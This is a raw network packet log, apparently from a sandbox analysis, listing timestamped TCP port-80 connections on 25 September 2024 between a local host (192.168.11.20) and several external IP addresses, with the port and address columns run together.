                                                                                  Sep 25, 2024 09:56:39.247157097 CEST804978338.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 09:56:39.247366905 CEST4978380192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 09:56:39.255040884 CEST4978380192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 09:56:39.571922064 CEST804978338.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 09:56:39.585125923 CEST804978338.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 09:56:39.585136890 CEST804978338.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 09:56:39.585330963 CEST4978380192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 09:56:40.758100986 CEST4978380192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 09:56:41.776238918 CEST4978480192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 09:56:42.094084024 CEST804978438.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 09:56:42.094316959 CEST4978480192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 09:56:42.103002071 CEST4978480192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 09:56:42.103049994 CEST4978480192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 09:56:42.103101015 CEST4978480192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 09:56:42.430314064 CEST804978438.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 09:56:42.430393934 CEST804978438.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 09:56:42.430553913 CEST804978438.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 09:56:42.430805922 CEST804978438.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 09:56:42.430947065 CEST804978438.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 09:56:42.431083918 CEST804978438.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 09:56:42.431229115 CEST4978480192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 09:56:43.616899967 CEST4978480192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 09:56:44.634536028 CEST4978580192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 09:56:44.954444885 CEST804978538.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 09:56:44.954648018 CEST4978580192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 09:56:44.959815979 CEST4978580192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 09:56:45.292454958 CEST804978538.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 09:56:45.292587042 CEST804978538.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 09:56:45.292612076 CEST804978538.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 09:56:45.292818069 CEST4978580192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 09:56:45.294778109 CEST4978580192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 09:56:45.625741959 CEST804978538.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 09:56:50.752018929 CEST4978680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:56:50.853952885 CEST80497863.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:56:50.854195118 CEST4978680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:56:50.861761093 CEST4978680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:56:50.963638067 CEST80497863.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:56:50.966495037 CEST80497863.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:56:50.966703892 CEST4978680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:56:52.364954948 CEST4978680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:56:52.466792107 CEST80497863.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:56:53.382976055 CEST4978780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:56:53.484960079 CEST80497873.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:56:53.485213995 CEST4978780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:56:53.492954969 CEST4978780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:56:53.594906092 CEST80497873.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:56:55.004961967 CEST4978780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:56:55.147109032 CEST80497873.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:56:56.022655010 CEST4978880192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:56:56.124602079 CEST80497883.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:56:56.124840021 CEST4978880192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:56:56.132637024 CEST4978880192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:56:56.132704020 CEST4978880192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:56:56.234657049 CEST80497883.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:56:56.234796047 CEST80497883.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:56:56.234805107 CEST80497883.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:56:56.234816074 CEST80497883.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:56:56.234894037 CEST80497883.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:56:56.234901905 CEST80497883.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:56:56.235022068 CEST80497883.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:56:56.236471891 CEST80497883.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:56:56.236715078 CEST4978880192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:56:56.512967110 CEST80497873.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:56:56.513197899 CEST4978780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:56:57.645061970 CEST4978880192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:56:57.747001886 CEST80497883.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:56:58.662607908 CEST4978980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:56:58.764806032 CEST80497893.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:56:58.765116930 CEST4978980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:56:58.770258904 CEST4978980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:56:58.872087002 CEST80497893.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:56:59.781140089 CEST80497893.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:56:59.781153917 CEST80497893.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:56:59.781533957 CEST4978980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:56:59.783474922 CEST4978980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:56:59.787061930 CEST80497893.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:56:59.787281036 CEST4978980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:56:59.885288954 CEST80497893.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:05.060687065 CEST4979080192.168.11.20162.213.249.216
                                                                                  Sep 25, 2024 09:57:05.359836102 CEST8049790162.213.249.216192.168.11.20
                                                                                  Sep 25, 2024 09:57:05.360059977 CEST4979080192.168.11.20162.213.249.216
                                                                                  Sep 25, 2024 09:57:05.367739916 CEST4979080192.168.11.20162.213.249.216
                                                                                  Sep 25, 2024 09:57:05.666404963 CEST8049790162.213.249.216192.168.11.20
                                                                                  Sep 25, 2024 09:57:05.688828945 CEST8049790162.213.249.216192.168.11.20
                                                                                  Sep 25, 2024 09:57:05.688921928 CEST8049790162.213.249.216192.168.11.20
                                                                                  Sep 25, 2024 09:57:05.689043045 CEST4979080192.168.11.20162.213.249.216
                                                                                  Sep 25, 2024 09:57:06.877453089 CEST4979080192.168.11.20162.213.249.216
                                                                                  Sep 25, 2024 09:57:07.895009041 CEST4979180192.168.11.20162.213.249.216
                                                                                  Sep 25, 2024 09:57:08.192714930 CEST8049791162.213.249.216192.168.11.20
                                                                                  Sep 25, 2024 09:57:08.192950964 CEST4979180192.168.11.20162.213.249.216
                                                                                  Sep 25, 2024 09:57:08.200606108 CEST4979180192.168.11.20162.213.249.216
                                                                                  Sep 25, 2024 09:57:08.497217894 CEST8049791162.213.249.216192.168.11.20
                                                                                  Sep 25, 2024 09:57:08.510865927 CEST8049791162.213.249.216192.168.11.20
                                                                                  Sep 25, 2024 09:57:08.511003971 CEST8049791162.213.249.216192.168.11.20
                                                                                  Sep 25, 2024 09:57:08.511104107 CEST4979180192.168.11.20162.213.249.216
                                                                                  Sep 25, 2024 09:57:09.705033064 CEST4979180192.168.11.20162.213.249.216
                                                                                  Sep 25, 2024 09:57:10.722481966 CEST4979280192.168.11.20162.213.249.216
                                                                                  Sep 25, 2024 09:57:11.011948109 CEST8049792162.213.249.216192.168.11.20
                                                                                  Sep 25, 2024 09:57:11.012236118 CEST4979280192.168.11.20162.213.249.216
                                                                                  Sep 25, 2024 09:57:11.020149946 CEST4979280192.168.11.20162.213.249.216
                                                                                  Sep 25, 2024 09:57:11.020195007 CEST4979280192.168.11.20162.213.249.216
                                                                                  Sep 25, 2024 09:57:11.308228016 CEST8049792162.213.249.216192.168.11.20
                                                                                  Sep 25, 2024 09:57:11.328962088 CEST8049792162.213.249.216192.168.11.20
                                                                                  Sep 25, 2024 09:57:11.328974009 CEST8049792162.213.249.216192.168.11.20
                                                                                  Sep 25, 2024 09:57:11.329200029 CEST4979280192.168.11.20162.213.249.216
                                                                                  Sep 25, 2024 09:57:12.532435894 CEST4979280192.168.11.20162.213.249.216
                                                                                  Sep 25, 2024 09:57:13.550050974 CEST4979380192.168.11.20162.213.249.216
                                                                                  Sep 25, 2024 09:57:13.846432924 CEST8049793162.213.249.216192.168.11.20
                                                                                  Sep 25, 2024 09:57:13.846716881 CEST4979380192.168.11.20162.213.249.216
                                                                                  Sep 25, 2024 09:57:13.851924896 CEST4979380192.168.11.20162.213.249.216
                                                                                  Sep 25, 2024 09:57:14.145468950 CEST8049793162.213.249.216192.168.11.20
                                                                                  Sep 25, 2024 09:57:14.183286905 CEST8049793162.213.249.216192.168.11.20
                                                                                  Sep 25, 2024 09:57:14.183553934 CEST8049793162.213.249.216192.168.11.20
                                                                                  Sep 25, 2024 09:57:14.183702946 CEST4979380192.168.11.20162.213.249.216
                                                                                  Sep 25, 2024 09:57:14.185528994 CEST4979380192.168.11.20162.213.249.216
                                                                                  Sep 25, 2024 09:57:14.473577023 CEST8049793162.213.249.216192.168.11.20
                                                                                  Sep 25, 2024 09:57:19.531697035 CEST4979480192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:19.633513927 CEST80497943.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:19.633711100 CEST4979480192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:19.641379118 CEST4979480192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:19.743187904 CEST80497943.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:19.745913029 CEST80497943.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:19.746078014 CEST4979480192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:21.155590057 CEST4979480192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:21.257778883 CEST80497943.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:22.174129963 CEST4979580192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:22.290208101 CEST80497953.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:22.290443897 CEST4979580192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:22.298674107 CEST4979580192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:22.400737047 CEST80497953.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:22.402189016 CEST80497953.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:22.402322054 CEST4979580192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:23.811148882 CEST4979580192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:23.913058996 CEST80497953.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:24.829772949 CEST4979680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:24.931736946 CEST80497963.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:24.931898117 CEST4979680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:24.939691067 CEST4979680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:24.939769983 CEST4979680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:25.041641951 CEST80497963.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:25.042145967 CEST80497963.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:25.042155981 CEST80497963.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:25.042165995 CEST80497963.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:25.042174101 CEST80497963.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:25.042181969 CEST80497963.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:25.042190075 CEST80497963.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:26.451214075 CEST4979680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:26.595020056 CEST80497963.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:27.468803883 CEST4979780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:27.571082115 CEST80497973.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:27.571283102 CEST4979780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:27.576461077 CEST4979780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:27.678299904 CEST80497973.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:27.682461977 CEST80497973.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:27.682962894 CEST80497973.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:27.683123112 CEST4979780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:27.684709072 CEST4979780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:27.690491915 CEST80497973.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:27.690700054 CEST4979780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:27.786998987 CEST80497973.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:27.969396114 CEST80497963.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:27.969568968 CEST4979680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:32.817807913 CEST4979880192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:32.919667006 CEST80497983.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:32.919774055 CEST4979880192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:32.927434921 CEST4979880192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:33.029357910 CEST80497983.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:33.938896894 CEST80497983.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:33.939193964 CEST4979880192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:34.433823109 CEST4979880192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:34.535726070 CEST80497983.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:34.652559996 CEST4976480192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:35.451771021 CEST4979980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:35.553690910 CEST80497993.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:35.553926945 CEST4979980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:35.562297106 CEST4979980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:35.664155960 CEST80497993.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:37.073879957 CEST4979980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:37.218291998 CEST80497993.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:38.091459990 CEST4980080192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:38.195493937 CEST80498003.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:38.195709944 CEST4980080192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:38.203566074 CEST4980080192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:38.203613043 CEST4980080192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:38.203641891 CEST4980080192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:38.305403948 CEST80498003.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:38.305471897 CEST80498003.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:38.305489063 CEST80498003.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:38.305625916 CEST80498003.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:38.305636883 CEST80498003.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:38.305648088 CEST80498003.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:38.305656910 CEST80498003.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:38.307065964 CEST80498003.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:38.307336092 CEST4980080192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:38.599859953 CEST80497993.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:38.600008011 CEST4979980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:39.713964939 CEST4980080192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:39.816226006 CEST80498003.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:40.731542110 CEST4980180192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:40.833888054 CEST80498013.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:40.834114075 CEST4980180192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:40.843882084 CEST4980180192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:40.946000099 CEST80498013.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:40.948753119 CEST80498013.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:40.948879957 CEST80498013.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:40.949201107 CEST4980180192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:40.950980902 CEST4980180192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:40.954394102 CEST80498013.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:40.954610109 CEST4980180192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:57:41.052834988 CEST80498013.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:57:46.160202026 CEST4980280192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:46.511836052 CEST8049802103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:46.512063980 CEST4980280192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:46.519728899 CEST4980280192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:46.875941038 CEST8049802103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:47.215883970 CEST8049802103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:47.216227055 CEST8049802103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:47.216243029 CEST8049802103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:47.216258049 CEST8049802103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:47.216274023 CEST8049802103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:47.216285944 CEST8049802103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:47.216428995 CEST4980280192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:47.216610909 CEST4980280192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:47.216610909 CEST4980280192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:47.216659069 CEST4980280192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:47.217171907 CEST8049802103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:47.217365026 CEST4980280192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:48.024575949 CEST4980280192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:48.294173956 CEST8049802103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:48.294408083 CEST4980280192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:49.042237997 CEST4980380192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:49.369721889 CEST8049803103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:49.370038033 CEST4980380192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:49.377686977 CEST4980380192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:49.705106974 CEST8049803103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:50.075261116 CEST8049803103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:50.075280905 CEST8049803103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:50.075309038 CEST8049803103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:50.075323105 CEST8049803103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:50.075335026 CEST8049803103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:50.075350046 CEST8049803103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:50.075362921 CEST8049803103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:50.075375080 CEST8049803103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:50.075387001 CEST8049803103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:50.075398922 CEST8049803103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:50.075515032 CEST4980380192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:50.075594902 CEST4980380192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:50.076383114 CEST8049803103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:50.076567888 CEST4980380192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:50.883353949 CEST4980380192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:51.901165009 CEST4980480192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:52.254482985 CEST8049804103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:52.254648924 CEST4980480192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:52.263336897 CEST4980480192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:52.263403893 CEST4980480192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:52.263437033 CEST4980480192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:52.608311892 CEST8049804103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:52.935847998 CEST8049804103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:52.935925007 CEST8049804103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:52.935939074 CEST8049804103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:52.935954094 CEST8049804103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:52.935967922 CEST8049804103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:52.935981035 CEST8049804103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:52.935992956 CEST8049804103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:52.936068058 CEST8049804103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:52.936084986 CEST4980480192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:52.936084986 CEST4980480192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:52.936131001 CEST4980480192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:52.936131001 CEST4980480192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:52.936136007 CEST8049804103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:52.936192036 CEST8049804103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:52.936252117 CEST4980480192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:52.936336994 CEST4980480192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:52.939230919 CEST8049804103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:52.939450026 CEST4980480192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:53.773308039 CEST4980480192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:54.790900946 CEST4980580192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:55.134521008 CEST8049805103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:55.134696007 CEST4980580192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:55.139872074 CEST4980580192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:55.489640951 CEST8049805103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:55.746186018 CEST8049805103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:55.746295929 CEST8049805103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:57:55.746479988 CEST4980580192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:55.750032902 CEST4980580192.168.11.20103.21.221.4
                                                                                  Sep 25, 2024 09:57:56.121691942 CEST8049805103.21.221.4192.168.11.20
                                                                                  Sep 25, 2024 09:58:01.754158020 CEST4980680192.168.11.20133.130.35.90
                                                                                  Sep 25, 2024 09:58:02.017673016 CEST8049806133.130.35.90192.168.11.20
                                                                                  Sep 25, 2024 09:58:02.017813921 CEST4980680192.168.11.20133.130.35.90
                                                                                  Sep 25, 2024 09:58:02.025504112 CEST4980680192.168.11.20133.130.35.90
                                                                                  Sep 25, 2024 09:58:02.308358908 CEST8049806133.130.35.90192.168.11.20
                                                                                  Sep 25, 2024 09:58:02.308387995 CEST8049806133.130.35.90192.168.11.20
                                                                                  Sep 25, 2024 09:58:02.308538914 CEST4980680192.168.11.20133.130.35.90
                                                                                  Sep 25, 2024 09:58:03.536747932 CEST4980680192.168.11.20133.130.35.90
                                                                                  Sep 25, 2024 09:58:04.554402113 CEST4980780192.168.11.20133.130.35.90
                                                                                  Sep 25, 2024 09:58:04.822890997 CEST8049807133.130.35.90192.168.11.20
                                                                                  Sep 25, 2024 09:58:04.823061943 CEST4980780192.168.11.20133.130.35.90
                                                                                  Sep 25, 2024 09:58:04.830764055 CEST4980780192.168.11.20133.130.35.90
                                                                                  Sep 25, 2024 09:58:05.105915070 CEST8049807133.130.35.90192.168.11.20
                                                                                  Sep 25, 2024 09:58:05.105925083 CEST8049807133.130.35.90192.168.11.20
                                                                                  Sep 25, 2024 09:58:05.106195927 CEST4980780192.168.11.20133.130.35.90
                                                                                  Sep 25, 2024 09:58:06.333089113 CEST4980780192.168.11.20133.130.35.90
                                                                                  Sep 25, 2024 09:58:07.350919962 CEST4980880192.168.11.20133.130.35.90
                                                                                  Sep 25, 2024 09:58:07.615780115 CEST8049808133.130.35.90192.168.11.20
                                                                                  Sep 25, 2024 09:58:07.615998030 CEST4980880192.168.11.20133.130.35.90
                                                                                  Sep 25, 2024 09:58:07.624305010 CEST4980880192.168.11.20133.130.35.90
                                                                                  Sep 25, 2024 09:58:07.624382973 CEST4980880192.168.11.20133.130.35.90
                                                                                  Sep 25, 2024 09:58:07.889236927 CEST8049808133.130.35.90192.168.11.20
                                                                                  Sep 25, 2024 09:58:07.889343977 CEST8049808133.130.35.90192.168.11.20
                                                                                  Sep 25, 2024 09:58:07.910007954 CEST8049808133.130.35.90192.168.11.20
                                                                                  Sep 25, 2024 09:58:07.910022974 CEST8049808133.130.35.90192.168.11.20
                                                                                  Sep 25, 2024 09:58:07.910306931 CEST4980880192.168.11.20133.130.35.90
                                                                                  Sep 25, 2024 09:58:09.129312992 CEST4980880192.168.11.20133.130.35.90
                                                                                  Sep 25, 2024 09:58:10.147356033 CEST4980980192.168.11.20133.130.35.90
                                                                                  Sep 25, 2024 09:58:10.422297001 CEST8049809133.130.35.90192.168.11.20
                                                                                  Sep 25, 2024 09:58:10.422511101 CEST4980980192.168.11.20133.130.35.90
                                                                                  Sep 25, 2024 09:58:10.427831888 CEST4980980192.168.11.20133.130.35.90
                                                                                  Sep 25, 2024 09:58:10.706590891 CEST8049809133.130.35.90192.168.11.20
                                                                                  Sep 25, 2024 09:58:10.706604004 CEST8049809133.130.35.90192.168.11.20
                                                                                  Sep 25, 2024 09:58:10.707004070 CEST4980980192.168.11.20133.130.35.90
                                                                                  Sep 25, 2024 09:58:10.709003925 CEST4980980192.168.11.20133.130.35.90
                                                                                  Sep 25, 2024 09:58:10.983484983 CEST8049809133.130.35.90192.168.11.20
